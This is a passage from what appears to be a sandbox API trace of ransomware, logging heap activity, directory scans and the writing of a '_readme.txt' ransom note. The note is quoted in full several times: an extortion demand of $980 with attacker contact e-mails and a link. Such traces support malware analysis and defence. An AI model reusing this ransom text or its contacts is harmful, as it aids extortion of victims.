hHeap=0x620000) returned 1 [0228.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.537] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0228.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.538] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.538] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.538] PathFindFileNameW (pszPath="") returned="" [0228.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.538] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.538] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.538] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.539] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.539] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0228.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.539] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0228.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.539] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.539] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.539] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.540] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.540] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.540] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.541] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.541] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.541] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | 